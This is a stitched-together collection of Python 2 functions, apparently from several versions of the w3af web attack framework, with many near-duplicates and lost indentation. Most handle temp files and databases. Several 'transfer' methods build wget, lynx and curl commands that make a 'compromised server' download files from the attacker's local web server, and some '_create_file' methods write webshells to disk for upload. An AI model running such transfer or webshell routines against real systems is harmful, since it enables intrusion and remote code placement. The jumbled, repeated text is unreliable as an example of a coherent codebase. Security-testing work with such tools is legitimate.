def transfer(self, data_str, destination):
'''
This method is used to transfer the data_str from w3af to the compromised server.
'''
if not self._command:
self.can_transfer()
commandTemplates = {}
commandTemplates['wget'] = 'wget http://%s:%s/%s -O %s'
commandTemplates['lynx'] = 'lynx -source http://%s:%s/%s > %s'
commandTemplates['curl'] = 'curl http://%s:%s/%s > %s'
# Create the file
filename = rand_alpha(10)
file_path = get_temp_dir() + os.path.sep + filename
f = file(file_path, 'w')
f.write(data_str)
f.close()
# Start a web server on the inbound port and create the file that
# will be fetched by the compromised host
webserver.start_webserver(cf.cf.get('local_ip_address'),
self._inbound_port,
get_temp_dir())
commandToRun = commandTemplates[self._command] % \
(cf.cf.get('local_ip_address'), self._inbound_port,
filename, destination)
self._exec_method(commandToRun)
os.remove(file_path)
return self.verify_upload(data_str, destination)
def transfer(self, data_str, destination):
'''
This method is used to transfer the data_str from w3af to the compromised server.
'''
if not self._command:
self.can_transfer()
commandTemplates = {}
commandTemplates['wget'] = 'wget http://%s:%s/%s -O %s'
commandTemplates['lynx'] = 'lynx -source http://%s:%s/%s > %s'
commandTemplates['curl'] = 'curl http://%s:%s/%s > %s'
# Create the file
filename = rand_alpha(10)
file_path = get_temp_dir() + os.path.sep + filename
f = file(file_path, 'w')
f.write(data_str)
f.close()
# Start a web server on the inbound port and create the file that
# will be fetched by the compromised host
webserver.start_webserver(cf.cf.get('local_ip_address'),
self._inbound_port, get_temp_dir())
commandToRun = commandTemplates[self._command] % \
(cf.cf.get('local_ip_address'), self._inbound_port,
filename, destination)
self._exec_method(commandToRun)
os.remove(file_path)
return self.verify_upload(data_str, destination)
def initStructure(self):
'''Init history structure.'''
sessionName = cf.cf.getData('sessionName')
dbName = os.path.join(get_temp_dir(), 'db_' + sessionName)
self._db = DB()
# Check if the database already exists
if os.path.exists(dbName):
# Find one that doesn't exist
for i in xrange(100):
newDbName = dbName + '-' + str(i)
if not os.path.exists(newDbName):
dbName = newDbName
break
self._db.connect(dbName)
self._sessionDir = os.path.join(get_temp_dir(),
self._db.getFileName() + '_traces')
tablename = self.getTableName()
# Init tables
self._db.createTable(
tablename,
self.getColumns(),
self.getPrimaryKeyColumns())
self._db.createIndex(tablename, self.getIndexColumns())
# Init dirs
try:
os.mkdir(self._sessionDir)
except OSError, oe:
# [Errno EEXIST] File exists
if oe.errno != EEXIST:
msg = 'Unable to write to the user home directory: ' + get_temp_dir()
raise w3afException(msg)
def transfer(self, strObject, destination):
"""
This method is used to transfer the strObject from w3af to the compromised server.
"""
if not self._command:
self.canTransfer()
commandTemplates = {}
commandTemplates["wget"] = "wget http://%s:%s/%s -O %s"
commandTemplates["lynx"] = "lynx -source http://%s:%s/%s > %s"
commandTemplates["curl"] = "curl http://%s:%s/%s > %s"
# Create the file
filename = createRandAlpha(10)
filePath = get_temp_dir() + os.path.sep + filename
f = file(filePath, "w")
f.write(strObject)
f.close()
# Start a web server on the inbound port and create the file that
# will be fetched by the compromised host
webserver.start_webserver(cf.cf.getData("localAddress"), self._inboundPort, get_temp_dir() + os.path.sep)
commandToRun = commandTemplates[self._command] % (
cf.cf.getData("localAddress"),
self._inboundPort,
filename,
destination,
)
self._exec_method(commandToRun)
os.remove(filePath)
return self.verify_upload(strObject, destination)
def _get_files( self ):
'''
If the extension is in the templates dir, open it and return the handler.
If the extension isn't in the templates dir, create a file with random
content, open it and return the handler.
@return: A list of open files.
'''
result = []
# All of this work is done in the "/tmp" directory:
for ext in self._extensions:
template_filename = 'template.' + ext
if template_filename in os.listdir( self._template_dir ):
#
# Copy to "/tmp"
#
# Open target
temp_dir = get_temp_dir()
low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
# Read source
template_content = file( os.path.join(self._template_dir, template_filename)).read()
# Write content to target
file_handler.write(template_content)
file_handler.close()
# Open the target again:
try:
file_handler = file( file_name, 'r')
except:
raise w3afException('Failed to open temp file: "' + file_name + '".')
else:
path, file_name = os.path.split(file_name)
result.append( (file_handler, file_name) )
else:
# I dont have a template for this file extension!
temp_dir = get_temp_dir()
low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + ext, dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
file_handler.write( createRandAlNum(32) )
file_handler.close()
path, file_name = os.path.split(file_name)
result.append( (file(file_name), file_name) )
return result
def _create_file(self, extension):
'''
Create a file with a webshell as content.
:return: Name of the file that was created.
'''
# Get content
file_content, real_extension = shell_handler.get_webshells(
extension, force_extension=True)[0]
if extension == '':
extension = real_extension
# Open target
temp_dir = get_temp_dir()
low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_',
suffix='.' + extension,
dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
# Write content to target
file_handler.write(file_content)
file_handler.close()
path, file_name = os.path.split(path_name)
return path, file_name
def clear_default_temp_db_instance():
global temp_default_db
if temp_default_db is not None:
temp_default_db.close()
temp_default_db = None
os.unlink('%s/main.db' % get_temp_dir())
def _remove_files(self, fileh_filen_list):
"""
Close all open files and remove them from disk. This is the reverse of
_create_files method.
:param fileh_filen_list: A list of tuples as generated by _create_files
:return: None
>>> from core.controllers.misc.temp_dir import create_temp_dir
>>> _ = create_temp_dir()
>>> fu = file_upload()
>>> dir_before = os.listdir( get_temp_dir() )
>>> fileh_filen_list = fu._create_files()
>>> fu._remove_files(fileh_filen_list)
>>> dir_after = os.listdir( get_temp_dir() )
>>> dir_before == dir_after
True
"""
for tmp_file_handle, tmp_file_name in fileh_filen_list:
try:
tmp_file_handle.close()
fname = os.path.join(get_temp_dir(), tmp_file_name)
os.remove(fname)
except:
pass
def _create_files(self):
"""
If the extension is in the templates dir, open it and return the handler.
If the extension isn't in the templates dir, create a file with random
content, open it and return the handler.
:return: A list of tuples with (file handler, file name)
"""
result = []
for ext in self._extensions:
# Open target
temp_dir = get_temp_dir()
low_level_fd, file_name = tempfile.mkstemp(prefix="w3af_", suffix="." + ext, dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
template_filename = "template." + ext
if template_filename in os.listdir(self.TEMPLATE_DIR):
content = file(os.path.join(self.TEMPLATE_DIR, template_filename)).read()
else:
# Since I don't have a template for this file extension, I'll simply
# put some random alnum inside the file
content = rand_alnum(64)
# Write content to target
file_handler.write(content)
file_handler.close()
# Open the target again, should never fail.
file_handler = file(file_name, "r")
_, file_name = os.path.split(file_name)
result.append((file_handler, file_name))
return result
def _remove_files(self, fileh_filen_list):
'''
Close all open files and remove them from disk. This is the reverse of
_create_files method.
:param fileh_filen_list: A list of tuples as generated by _create_files
:return: None
>>> from core.controllers.misc.temp_dir import create_temp_dir
>>> _ = create_temp_dir()
>>> fu = file_upload()
>>> dir_before = os.listdir( get_temp_dir() )
>>> fileh_filen_list = fu._create_files()
>>> fu._remove_files(fileh_filen_list)
>>> dir_after = os.listdir( get_temp_dir() )
>>> dir_before == dir_after
True
'''
for tmp_file_handle, tmp_file_name in fileh_filen_list:
try:
tmp_file_handle.close()
fname = os.path.join(get_temp_dir(), tmp_file_name)
os.remove(fname)
except:
pass
def clear_default_temp_db_instance():
global temp_default_db
if temp_default_db is not None:
temp_default_db.close()
temp_default_db = None
os.unlink('%s/main.db' % get_temp_dir())
def get_default_temp_db_instance():
global temp_default_db
if temp_default_db is None:
create_temp_dir()
temp_default_db = SQLiteDBMS('%s/main.db' % get_temp_dir())
return temp_default_db
def get_default_temp_db_instance():
global temp_default_db
if temp_default_db is None:
create_temp_dir()
temp_default_db = SQLiteDBMS('%s/main.db' % get_temp_dir())
return temp_default_db
def get_temp_file():
#
# Create the temp file
#
tempdir = get_temp_dir()
if not os.path.exists(tempdir):
os.makedirs(tempdir)
filename = ''.join([choice(string.letters) for _ in range(12)])
temp_file = os.path.join(tempdir, filename + '-w3af.bloom')
return temp_file
def __init__(self, capacity, error_rate=0.01):
generic_bloomfilter.__init__(self, capacity, error_rate)
#
# Create the temp file
#
tempdir = get_temp_dir()
if not os.path.exists( tempdir ):
os.makedirs( tempdir )
filename = ''.join([choice(string.letters) for i in range(12)]) + '.w3af.bloom'
temp_file = os.path.join(tempdir, filename)
self.bf = mmap_filter(capacity, error_rate, temp_file)
def __init__(self):
'''
Create the shelve, and the thread lock.
@return: None
'''
# Init some attributes
self._shelve = None
self._filename = None
# Create the lock
self._shelve_lock = threading.RLock()
fail_count = 0
while True:
# Get the temp filename to use
tempdir = get_temp_dir()
filename = ''.join([choice(string.letters) for _ in range(12)]) + '.w3af.temp_shelve'
self._filename = os.path.join(tempdir, filename)
# https://sourceforge.net/tracker/?func=detail&aid=2828136&group_id=170274&atid=853652
if (sys.platform=='win32') or (sys.platform=='cygwin'):
self._filename = self._filename.decode( "MBCS" ).encode("utf-8" )
try:
# Create the shelve
self._shelve = shelve.open(self._filename, flag='c')
except Exception, e:
self._filename = None
fail_count += 1
if fail_count == 5:
msg = 'Failed to create shelve file "%s". Original exception: "%s"'
raise Exception( msg % (self._filename, e))
else:
break
# Now we perform a small trick... we remove the temp file directory entry
#
# According to the python documentation: On Windows, attempting to remove a file that
# is in use causes an exception to be raised; on Unix, the directory entry is removed
# but the storage allocated to the file is not made available until the original file
# is no longer in use
try:
os.remove(self._filename)
except Exception:
pass
def test_removes_cache(self):
url = URL('http://moth/')
self.uri_opener.GET(url, cache=False)
# Please note that this line, together with the tearDown() act as
# a test for a "double call to end()".
self.uri_opener.end()
db_fmt = 'db_unittest-%s'
trace_fmt = 'db_unittest-%s_traces/'
temp_dir = get_temp_dir()
for i in xrange(100):
test_db_path = os.path.join(temp_dir, db_fmt % i)
test_trace_path = os.path.join(temp_dir, trace_fmt % i)
self.assertFalse(os.path.exists(test_db_path), test_db_path)
self.assertFalse(os.path.exists(test_trace_path), test_trace_path)
def test_removes_cache(self):
url = URL('http://moth/')
self.uri_opener.GET(url, cache=False)
# Please note that this line, together with the tearDown() act as
# a test for a "double call to end()".
self.uri_opener.end()
db_fmt = 'db_unittest-%s'
trace_fmt = 'db_unittest-%s_traces/'
temp_dir = get_temp_dir()
for i in xrange(100):
test_db_path = os.path.join(temp_dir, db_fmt % i)
test_trace_path = os.path.join(temp_dir, trace_fmt % i)
self.assertFalse(os.path.exists(test_db_path), test_db_path)
self.assertFalse(os.path.exists(test_trace_path), test_trace_path)
def _create_file( self, extension ):
'''
Create a file with a webshell as content.
@return: Name of the file that was created.
'''
# Get content
file_content, real_extension = shell_handler.get_webshells( extension, forceExtension=True )[0]
if extension == '':
extension = real_extension
# Open target
temp_dir = get_temp_dir()
low_level_fd, self._path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
# Write content to target
file_handler.write(file_content)
file_handler.close()
_path, self._file_name = os.path.split(self._path_name)
return self._path_name
def _create_file(self, extension):
"""
Create a file with a webshell as content.
:return: Name of the file that was created.
"""
# Get content
file_content, real_extension = shell_handler.get_webshells(extension, force_extension=True)[0]
if extension == "":
extension = real_extension
# Open target
temp_dir = get_temp_dir()
low_level_fd, path_name = tempfile.mkstemp(prefix="w3af_", suffix="." + extension, dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
# Write content to target
file_handler.write(file_content)
file_handler.close()
path, file_name = os.path.split(path_name)
return path, file_name
def _create_files(self):
'''
If the extension is in the templates dir, open it and return the handler.
If the extension isn't in the templates dir, create a file with random
content, open it and return the handler.
:return: A list of tuples with (file handler, file name)
'''
result = []
for ext in self._extensions:
# Open target
temp_dir = get_temp_dir()
low_level_fd, file_name = tempfile.mkstemp(prefix='w3af_',
suffix='.' + ext,
dir=temp_dir)
file_handler = os.fdopen(low_level_fd, "w+b")
template_filename = 'template.' + ext
if template_filename in os.listdir(self.TEMPLATE_DIR):
content = file(
os.path.join(self.TEMPLATE_DIR, template_filename)).read()
else:
# Since I don't have a template for this file extension, I'll simply
# put some random alnum inside the file
content = rand_alnum(64)
# Write content to target
file_handler.write(content)
file_handler.close()
# Open the target again, should never fail.
file_handler = file(file_name, 'r')
_, file_name = os.path.split(file_name)
result.append((file_handler, file_name))
return result
def __init__(self, text_factory=sqlite3.OptimizedUnicode):
'''
Create the sqlite3 database and the thread lock.
@param text_factory: A callable object to handle strings.
'''
# Init some attributes
self._conn = None
self._filename = None
self._current_index = 0
# text factory for the connection
self._text_factory = text_factory
# Create the lock
self._db_lock = threading.RLock()
fail_count = 0
while True:
# Get the temp filename to use
tempdir = get_temp_dir()
filename = ''.join([choice(string.letters) for i in range(12)]) + '.w3af.temp_db'
self._filename = os.path.join(tempdir, filename)
if sys.platform in ('win32', 'cygwin'):
self._filename = self._filename.decode("MBCS").encode("utf-8")
try:
# Create the database
self._conn = sqlite3.connect(self._filename, check_same_thread=False)
# Set up the text_factory to the connection
self._conn.text_factory = self._text_factory
# Create table
self._conn.execute(
'''CREATE TABLE data (index_ real, information text)''')
# Create index
self._conn.execute(
'''CREATE INDEX data_index ON data(information)''')
except Exception, e:
fail_count += 1
if fail_count == 5:
raise Exception('Failed to create database file. '
'Original exception: "%s %s"' % (e, self._filename))
self._filename = None
else:
break
# Now we perform a small trick... we remove the temp file directory entry
#
# According to the python documentation: On Windows, attempting to remove a file that
# is in use causes an exception to be raised; on Unix, the directory entry is removed
# but the storage allocated to the file is not made available until the original file
# is no longer in use
try:
os.remove(self._filename)
except Exception:
pass
def __init__(self, text_factory=sqlite3.OptimizedUnicode):
"""
Create the sqlite3 database and the thread lock.
@param text_factory: A callable object to handle strings.
@return: None
"""
# Init some attributes
self._conn = None
self._filename = None
self._current_index = 0
# text factory for the connection
self._text_factory = text_factory
# Create the lock
self._db_lock = threading.RLock()
fail_count = 0
while True:
# Get the temp filename to use
tempdir = get_temp_dir()
filename = "".join([choice(string.letters) for i in range(12)]) + ".w3af.temp_db"
self._filename = os.path.join(tempdir, filename)
# https://sourceforge.net/tracker/?func=detail&aid=2828136&group_id=170274&atid=853652
if (sys.platform == "win32") or (sys.platform == "cygwin"):
self._filename = self._filename.decode("MBCS").encode("utf-8")
try:
# Create the database
self._conn = sqlite3.connect(self._filename, check_same_thread=False)
# Set up the text_factory to the connection
# See http://sourceforge.net/tracker/?func=detail&aid=3045048&group_id=170274&atid=853652
self._conn.text_factory = self._text_factory
# Create table
self._conn.execute("""create table data (index_ real, information text)""")
except Exception, e:
fail_count += 1
if fail_count == 5:
msg = 'Failed to create database file. Original exception: "%s %s"' % (e, self._filename)
raise Exception(msg)
self._filename = None
else:
break
# Now we perform a small trick... we remove the temp file directory entry
#
# According to the python documentation: On Windows, attempting to remove a file that
# is in use causes an exception to be raised; on Unix, the directory entry is removed
# but the storage allocated to the file is not made available until the original file
# is no longer in use
try:
os.remove(self._filename)
except Exception:
pass
def __init__(self):
self._db = get_default_temp_db_instance()
self._session_dir = os.path.join(get_temp_dir(),
self._db.get_file_name() + '_traces')
def get_temp_filename():
temp_dir = get_temp_dir()
fname = ''.join(starmap(choice, repeat((string.letters,), 18)))
filename = os.path.join(temp_dir, fname + '.w3af.temp_db')
return filename
def get_temp_filename():
temp_dir = get_temp_dir()
fname = ''.join(starmap(choice, repeat((string.letters, ), 18)))
filename = os.path.join(temp_dir, fname + '.w3af.temp_db')
return filename
def __init__(self):
self._db = get_default_temp_db_instance()
self._session_dir = os.path.join(get_temp_dir(),
self._db.get_file_name() + '_traces')
def __init__(self):
"""
Create the sqlite3 database and the thread lock.
@param text_factory: A callable object to handle strings.
"""
# Init some attributes
self._conn = None
self._filename = None
self._current_index = 0
# Create the lock
self._db_lock = threading.RLock()
fail_count = 0
while True:
# Get the temp filename to use
tempdir = get_temp_dir()
# A 12-chars random string
fn = "".join(starmap(choice, repeat((string.letters,), 12)))
self._filename = os.path.join(tempdir, fn + ".w3af.temp_db")
if sys.platform in ("win32", "cygwin"):
self._filename = self._filename.decode("MBCS").encode("utf-8")
try:
# Create the database
self._conn = sqlite3.connect(self._filename, check_same_thread=False)
self._conn.text_factory = str
# Modify some default values
# http://www.sqlite.org/pragma.html#pragma_cache_size (default: 2000)
# less pages in memory
self._conn.execute("PRAGMA cache_size = 200")
# http://www.sqlite.org/pragma.html#pragma_synchronous (default: 1)
# sends data to OS and does NOT wait for it to be on-disk
self._conn.execute("PRAGMA synchronous = 0")
# http://www.sqlite.org/pragma.html#pragma_synchronous
# disables journal -> ROLLBACK
self._conn.execute("PRAGMA journal_mode = OFF")
# Create table
self._conn.execute("""CREATE TABLE data (index_ REAL PRIMARY KEY, eq_attrs BLOB, pickle BLOB)""")
# Create index
self._conn.execute("""CREATE INDEX data_index ON data(eq_attrs)""")
except Exception, e:
fail_count += 1
if fail_count == 5:
raise Exception(
"Failed to create database file. " 'Original exception: "%s %s"' % (e, self._filename)
)
self._filename = None
else:
break
# Now we perform a small trick... we remove the temp file directory
# entry
#
# According to the python documentation: On Windows, attempting to
# remove a file that is in use causes an exception to be raised;
# on Unix, the directory entry is removed but the storage allocated
# to the file is not made available until the original file is no
# longer in use
try:
os.remove(self._filename)
except Exception:
pass
